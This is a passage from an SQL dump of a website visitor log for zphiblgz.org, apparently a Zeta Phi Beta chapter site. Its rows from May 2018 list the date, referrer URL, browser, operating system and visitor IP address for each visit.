80.194.30','000',1,0),(30172,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.80.80','000',1,0),(30173,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(30174,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.209.128','000',1,0),(30175,'2018-05-08','https://www.google.com/','Safari','iPhone','11.0','','174.205.39.61','000',6,0),(30176,'2018-05-08','https://zphiblgz.org','Chrome','Windows','66.0.3359.139','','50.201.151.83','000',8,0),(30177,'2018-05-08','https://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','54.191.34.69','000',4,0),(30178,'2018-05-08','https://www.google.com/','Chrome','iPhone','66.0.3359.122','','99.3.172.221','000',1,0),(30179,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.206','000',1,0),(30180,'2018-05-08','https://zphiblgz.org','Firefox','Windows','57.0','','52.173.241.248','000',1,0),(30181,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','195.176.3.20','000',1,0),(30182,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(30183,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',1,0),(30184,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.64.39','000',1,0),(30185,'2018-05-08','https://zphiblgz.org','Chrome','Macintosh','49.0.2655.74','','146.185.223.221','000',1,0),(30186,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.127.145','000',1,0),(30187,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(30188,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','142.44.154.169','000',1,0),(30189,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.29','000',1,0),(30190,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','198.96.155.3','000',1,0),(30191,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.19','000',1,0),(30192,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.99.200','000',1,0),(30193,'2018-05-09','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','146.185.223.113','000',1,0),(30194,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.82.2','000',1,0),(30195,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.21','000',1,0),(30196,'2018-05-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.45.95','000',2,0),(30197,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(30198,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',1,0),(30199,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.228.129.2','000',1,0),(30200,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.4','000',1,0),(30201,'2018-05-09','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',14,0),(30202,'2018-05-09','https://zphiblgz.org','Chrome','Linux','54.0.2882.82','','146.185.223.25','000',1,0),(30203,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.18','000',1,0),(30204,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.107.47.171','000',1,0),(30205,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.162','000',1,0),(30206,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(30207,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.152.65.180','000',1,0),(30208,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','205.185.113.14','000',1,0),(30209,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','5.79.86.15','000',1,0),(30210,'2018-05-09','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30211,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.65.25','000',1,0),(30212,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.5','000',2,0),(30213,'2018-05-09','https://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.83','000',2,0),(30214,'2018-05-09','https://animenime.ru/','MSIE','Windows','6.0','','46.118.114.175','000',3,0),(30215,'2018-05-09','http://www.bing.com/search?q=sample+reommendation+letter+for+a+zeta+phi+beta+scholarship&form=IE9TR&src=IE9TR&pc=MDDRJS','MSIE','Windows','11.0','','12.207.152.2','000',4,0),(30216,'2018-05-09','http://zphiblgz.org/administrator/index.php','Opera Next','Windows','49.0.2711.0','','194.28.115.251','000',2,0),(30217,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.104.19','000',1,0),(30218,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(30219,'2018-05-09','https://zphiblgz.org','MSIE','Windows','11.0','','50.250.195.69','000',2,0),(30220,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.130.183.184','000',2,0),(30221,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.116.201','000',1,0),(30222,'2018-05-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(30223,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.229.237.53','000',1,0),(30224,'2018-05-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(30225,'2018-05-09','https://zphiblgz.org','Firefox','Windows','40.1','','201.250.47.214','000',2,0),(30226,'2018-05-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(30227,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.158.216.52','000',1,0),(30228,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.129.91','000',1,0),(30229,'2018-05-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(30230,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.148.138','000',1,0),(30231,'2018-05-09','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.35','000',1,0),(30232,'2018-05-09','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(30233,'2018-05-09','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(30234,'2018-05-09','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(30235,'2018-05-09','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(30236,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(30237,'2018-05-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(30238,'2018-05-09','https://zphiblgz.org','Safari','iPhone','11.0','','108.15.43.53','000',3,0),(30239,'2018-05-09','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30240,'2018-05-09','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',3,0),(30241,'2018-05-09','http://www.google.com/','Chrome','Android','66.0.3359.126','','131.118.255.194','000',1,0),(30242,'2018-05-09','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.2','000',1,0),(30243,'2018-05-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.15','000',1,0),(30244,'2018-05-09','https://zphiblgz.org/','Firefox','Windows','52.0','','137.74.132.80','000',2,0),(30245,'2018-05-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','142.4.211.161','000',1,0),(30246,'2018-05-09','https://r.search.aol.com/_ylt=AwrBT4LDxvNax.8AXwxpCWVH;_ylu=X3oDMTBzdWd2cWI5BGNvbG8DYmYxBHBvcwMxMAR2dGlkAwRzZWMDc3I-/RV=2/RE=1525954372/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=0/RS=Ali5o6BlL3jHuKmlH4aEJuHBl0w-','Edge','Windows','16.16299','','24.228.185.39','000',2,0),(30247,'2018-05-10','https://www.google.com.af/','Chrome','Windows','66.0.3359.139','','125.213.221.170','000',3,0),(30248,'2018-05-10','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','109.74.200.87','000',2,0),(30249,'2018-05-10','https://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.83','000',1,0),(30250,'2018-05-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.248.160.21','000',1,0),(30251,'2018-05-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(30252,'2018-05-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.1','000',1,0),(30253,'2018-05-10','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','131.253.27.56','000',1,0),(30254,'2018-05-10','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(30255,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.axcw17yY_Cw7_x3zSk7B6Rc3MaYJOU0Pjl4fxm0-rMA.fb950eee044f183ba5e101859c5461d708ea75e0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cWlQdkduZGxLX3J3cnc0MzhnQ1RsWFpXUENZVG9DMTgxdjVRUS00VDRWdyws&sign=0a6d2aa417031921cd57cec28fe4e952&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(30256,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.eMC5XZBZ4wSa2n69Lke3BoAr3bbKiyiKt3U7qE4BRrA.a1f33828ffd2b71dcb0347cf01b8ef74f996459e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041eEp1SWgtaXRwakhfVXFnVldwWmQtR0x0aTJfYU10Y0hua3JrVWV2cnJLQSws&sign=621e4034d48cd8744dbc2a3eca811f43&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.122.69','000',2,0),(30257,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.rBRtbjOELJ7hlJZrJgM4bf5l0QvlsCMENnuft9VDYAQ.e1eba56722b836b927cb972c70e8a288b2925e9c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RGhQeVV6bllGbURjaEczR2UwOFI5Nm84dlNCVkItdkNSdm5VSWlTWGpmdyws&sign=f9bb77543a79b7ed20fbc9cca835ea5f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.132','000',2,0),(30258,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.scNpz9DvtX58jbPScy8zdpnuewoA7DRWPnAuVLC2pwM.ebc170ec94867284c065e2bac9ce2f8818bbcaac&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VThOWWowLVMyd1NuZW9UYTNkOGhIUWVnMUtqVVUwTEY2WmpxMGxsVTB0dyws&sign=54c70e93b5ae1792c1ead6a1422efdf0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.86.185','000',2,0),(30259,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.MG0Rz1PCu_oeKtrfqrxuSApGHcVF41zLveKT5y7Hzik.2448c098feaed1cb294302b143c05e8deef611f4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040UkN1R0FrZmNZY2NucEhKSElsM0dPOVZ5YTI2VmtrcmNVTE1LREd6bDJzUSws&sign=d3488c2b2bbaf6d7333d4fdad4843450&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.200.65','000',2,0),(30260,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.x7sa9ftR_NWrrHgM6sTizfHfd6o9K-PBVwY9abnEGfQ.92480a4f6ea05f0366880bc7c82b96a2d2142d04&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040T0FkemVzQ05fampsd0dhbzZvYVo0cko2UjBEV1lyZ21PZWs2T1BxT2l6QSws&sign=fb8e09f5dd7faaa6c84d7d3a8fda820f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.174.84','000',2,0),(30261,'2018-05-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1783.QoKCA1Ue1nRAB5SjZgs2gWoL2VT3uereLgbE7oVQ5eo.b8d7410a878c043f605688582534dd36082deba8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VldXekZtek9najhHSkxWaklUeTBTOGU0aTNFclFNUnZISHVnWW1idmtUQSws&sign=4ba7d5693e83e9ee3b488f3ed828a9ed&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.161.26','000',2,0),(30262,'2018-05-10','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(30263,'2018-05-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.14','000',1,0),(30264,'2018-05-10','https://www.google.com/','Silk','Kindle Fire','66.2.1','','66.108.231.19','000',2,0),(30265,'2018-05-10','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',2,0),(30266,'2018-05-10','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','14.202.250.89','000',2,0),(30267,'2018-05-10','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','40.77.190.48','000',1,0),(30268,'2018-05-10','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.66','000',1,0),(30269,'2018-05-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(30270,'2018-05-10','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30271,'2018-05-10','https://zphiblgz.org/event/howard-county-volunteer-year-reception/','AppleWebKit','Windows','534','','199.30.25.139','000',1,0),(30272,'2018-05-10','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.27','000',1,0),(30273,'2018-05-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(30274,'2018-05-10','http://zphiblgz.org/','Firefox','Windows','52.42.99','','45.227.254.240','000',2,0),(30275,'2018-05-10','https://zphiblgz.org','Firefox','Windows','40.1','','92.251.217.152','000',2,0),(30276,'2018-05-10','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','163.172.31.159','000',8,0),(30277,'2018-05-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(30278,'2018-05-10','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(30279,'2018-05-10','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(30280,'2018-05-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(30281,'2018-05-10','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(30282,'2018-05-10','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(30283,'2018-05-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(30284,'2018-05-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(30285,'2018-05-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',1,0),(30286,'2018-05-11','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','163.172.31.159','000',2,0),(30287,'2018-05-11','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.23.100','000',2,0),(30288,'2018-05-11','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.69','000',1,0),(30289,'2018-05-11','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(30290,'2018-05-11','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','5.12.235.185','000',2,0),(30291,'2018-05-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1784.zF_CF2gw082WoXEpW6xCwBqZGdZLFtcRutoxFI7GyMc.82d29aa7bda97439a3e65bb43b2637cce1154186&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041cVdHcDVHN3ZvbVlsQ0p4dVYtem40TE5MY09PT0dnRnpWNjl1YU5VRHh0dyws&sign=06704cb9f97d46e15b9706c0a213e92d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.158.127','000',2,0),(30292,'2018-05-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1784.bYDKCuA5QHKDk1S4YuWtZhpVSOYYysFbgvLBDYAjtmM.a8ba21644d26474812018f62ce151a6fe4cd695c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SkFtdnlQR3hqT0E0X01GbUwtU2xmRjRJY013M1ZtREtzeE4tOGxBZ25oUSws&sign=1e880cf83f6009fd4a98435384e6549c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.132','000',2,0),(30293,'2018-05-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(30294,'2018-05-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1784.Zv9sMsZKSTBAJjmYnWcMVkol1WfW63uOGi1T10Wsox8.0f53fc6bf3d3c444afef0df004523fbfaf8734a3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WVI5REFoYVJsVDNQQTE0QUJCZmJJdGtHMW40UnEtRHFLRklUbDZQV3ZLUSws&sign=9bb749d9244616b38810e09286e893b3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.254.86.52','000',2,0),(30295,'2018-05-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1784.SCZY0uDq5vp-47aD-AvFfJr4wZN1sjW4k4jZtUZdnO8.55eefc73fdb571e3654f3ae28cf40fb125b823d9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YUlKTjlIcDY0RFlWOVZEeW1sR2JYdnczbENMTDZtMF8yR3FVVVVxY3prQSws&sign=534f14107231a3cf23859f15b49c70fe&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.32.102.98','000',2,0),(30296,'2018-05-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1784.xU9bmoSplPyu-QHx13M0sd-Ao7xz1g1Jh1Ah7_-QYyM.8046d214fd14993b2aeba8ba8e51f7fd22795602&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SkwyTXRxUjF6aXVHdFdTX18yQkVlNE5IOGRKYzBId05EckdscDhxTUtXZyws&sign=5d3efddb5b7f66b0c5e3862ce6349705&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.70.193','000',2,0),(30297,'2018-05-11','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(30298,'2018-05-11','https://zphiblgz.org','Firefox','Windows','57.0','','144.76.71.83','000',1,0),(30299,'2018-05-11','https://www.bing.com/','Safari','iPad','11.0','','96.241.201.75','000',2,0),(30300,'2018-05-11','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.100.252','000',1,0),(30301,'2018-05-11','https://zphiblgz.org','Firefox','Windows','40.1','','150.107.10.233','000',2,0),(30302,'2018-05-11','https://www.google.com/','Firefox','Windows','54.0','','50.225.39.70','000',8,0),(30303,'2018-05-11','https://www.google.com/','Chrome','Windows','66.0.3359.139','','76.165.129.46','000',2,0),(30304,'2018-05-11','http://google.com','Firefox','Windows','9.0.1','','2.60.41.13','000',2,0),(30305,'2018-05-11','https://zphiblgz.org','Firefox','Windows','59.0','','198.51.197.42','000',4,0),(30306,'2018-05-11','https://zphiblgz.org','Chrome','Windows','27.0.1500.55','','159.65.0.193','000',2,0),(30307,'2018-05-11','https://zphiblgz.org','Chrome','Macintosh','32.0.1664.3','','159.65.0.193','000',2,0),(30308,'2018-05-11','https://zphiblgz.org','Opera','Windows','12.0','','159.65.0.193','000',2,0),(30309,'2018-05-11','https://zphiblgz.org','Chrome','Windows','24.0.1295.0','','159.65.0.193','000',1,0),(30310,'2018-05-11','https://zphiblgz.org','Firefox','Windows','40.1','','105.104.214.235','000',2,0),(30311,'2018-05-11','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.135','000',2,0),(30312,'2018-05-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30313,'2018-05-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30314,'2018-05-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(30315,'2018-05-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(30316,'2018-05-11','https://zphiblgz.org','Firefox','Windows','40.1','','206.132.109.91','000',2,0),(30317,'2018-05-11','https://zphiblgz.org','Chrome','Linux','34.0.1874.9','','107.161.151.115','000',2,0),(30318,'2018-05-11','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',3,0),(30319,'2018-05-11','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(30320,'2018-05-11','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(30321,'2018-05-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(30322,'2018-05-11','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(30323,'2018-05-11','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(30324,'2018-05-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',2,0),(30325,'2018-05-11','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','66.240.192.138','000',1,0),(30326,'2018-05-11','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(30327,'2018-05-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(30328,'2018-05-11','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','5.9.17.118','000',1,0),(30329,'2018-05-12','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(30330,'2018-05-12','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(30331,'2018-05-12','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.87.233.140','000',2,0),(30332,'2018-05-12','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.171','000',2,0),(30333,'2018-05-12','https://zphiblgz.org','MSIE','Windows','8.0','','54.196.138.168','000',1,0),(30334,'2018-05-12','https://zphiblgz.org','MSIE','Windows','8.0','','34.211.48.6','000',1,0),(30335,'2018-05-12','https://zphiblgz.org','MSIE','Windows','8.0','','35.163.194.255','000',1,0),(30336,'2018-05-12','https://zphiblgz.org','Python-urllib','Unknown','2.7','','118.219.252.197','000',2,0),(30337,'2018-05-12','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',2,0),(30338,'2018-05-12','https://zphiblgz.org','MSIE','Windows','9.0','','113.35.251.98','000',1,0),(30339,'2018-05-12','https://zphiblgz.org/','Firefox','Windows','57.0','','46.30.165.52','000',2,0),(30340,'2018-05-12','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(30341,'2018-05-12','https://zphiblgz.org','Firefox','Windows','40.1','','41.102.250.131','000',2,0),(30342,'2018-05-12','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',14,0),(30343,'2018-05-12','https://zphiblgz.org','Firefox','Windows','40.1','','79.47.49.244','000',2,0),(30344,'2018-05-12','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','163.172.31.159','000',1,0),(30345,'2018-05-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.118','000',1,0),(30346,'2018-05-12','https://zphiblgz.org','Firefox','Windows','57.0','','104.227.97.122','000',18,0),(30347,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1785.nyRGUej_mf3qNsU5X6Lggdv6XFopUeEGhqBoKKBU3qk.5e0c299b4a606df9e22b4b91d0377a2a4d984f71&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZmdVcWtBaVYyY0RmeWo0dnh1VkRBcDBZaHlIMW1ReGFMaVl6YlN3cS0ydyws&sign=ad66181fc59e9f811b1757a34b01fe86&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.99.10','000',2,0),(30348,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1785.LKA5mqy_-o_gfopsQMhtn4yzKMnnfozhI3fkkSwMnLI.95f564de32e69a5d17a24002e434652f53cbd32e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SDlPeTB4S01QcS1WcEhhMU9Rcmd1SXc1N1R5WDg4X25zalpiZHB4SEc0Zyws&sign=f5aa3e50f66199b43b142614401356d3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.42','000',1,0),(30349,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2